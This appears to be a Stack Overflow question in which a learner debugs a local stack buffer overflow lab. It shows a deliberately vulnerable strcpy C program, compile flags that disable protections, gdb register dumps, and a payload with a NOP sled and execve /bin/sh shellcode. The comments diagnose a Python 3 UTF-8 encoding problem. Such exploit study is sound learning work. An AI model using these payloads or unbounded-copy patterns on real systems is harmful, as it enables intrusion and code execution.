0

for few days I'm working on a C buffer overflow on my wsl ubuntu. My vulnerable code is

#include <stdio.h>
#include <string.h>

void overflow_me(char* dizi){
    char buff_array[100];
    strcpy(buff_array,dizi);
    printf("Hosgeldin %s",buff_array);
}

int main(int argc, char *argv[]){
    overflow_me(argv[1]);
    return 0;
}

I compiled my code withgcc -g -o overflow overflow.c -m32 -fno-stack-protector -fno-pie -z execstack -mpreferred-stack-boundary=2 then I tried to overflow with gdb. I run run $(python3 -c 'print ("\x41"*100+"A"*4+"E"*4)') command in gdb. And I could overwrite eip and ebp registers successfully.

eax            0x76                118
ecx            0x0                 0
edx            0x56557014          1448439828
ebx            0x0                 0
esp            0xffffd124          0xffffd124
ebp            0x41414141          0x41414141
esi            0xf7fb7000          -134516736
edi            0xf7fb7000          -134516736
eip            0x45454545          0x45454545
eflags         0x10286             [ PF SF IF RF ]
cs             0x23                35
ss             0x2b                43
ds             0x2b                43
es             0x2b                43
fs             0x0                 0
gs             0x63                99

then I tried it like [nop-sled][shellcode][bunch of E's] run $(python3 -c 'print ("\x90"*63+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"+"E"*20)') . However, I think nop sled crashes something because after this command my registers became :

eax            0xbf                191
ecx            0x0                 0
edx            0x56557014          1448439828
ebx            0x0                 0
esp            0xffffd0d4          0xffffd0d4
ebp            0x90c290c2          0x90c290c2
esi            0xf7fb7000          -134516736
edi            0xf7fb7000          -134516736
eip            0x90c290c2          0x90c290c2
eflags         0x10282             [ SF IF RF ]
cs             0x23                35
ss             0x2b                43
ds             0x2b                43
es             0x2b                43
fs             0x0                 0
gs             0x63                99

Why I can't overwrite the eip when I run it with nop sled and how can I fix it ?

Peter Cordes
  • 328,167
  • 45
  • 605
  • 847
ogulcanhgul
  • 23
  • 6
  • Set a breakpoint earlier so you can `stepi` the ret, or examine the situation *before* that. `-z execstack` in modern toolchains and kernels only makes the stack itself executable, not all pages, but that's still sufficient because your buffer is in fact on the stack. – Peter Cordes Apr 24 '21 at 11:29
  • The high byte of your return address is `0x90`, which is *highly* suspicious. Yeah, run your python command and pipe into `hexdump -C`; you're printing 63 repeats of `c2 90`, not `90`. So it seems you're doing something wrong with Python, like perhaps letting it do some kind of UTF-8 thing. As a quick fix you could use `0x41` inc ecx as a sled instead, or google the answer to the Python question. – Peter Cordes Apr 24 '21 at 11:32
  • Exact duplicate of [outputing nop (\x90) to a file](https://stackoverflow.com/q/61207044) – Peter Cordes Apr 24 '21 at 11:38

0 Answers0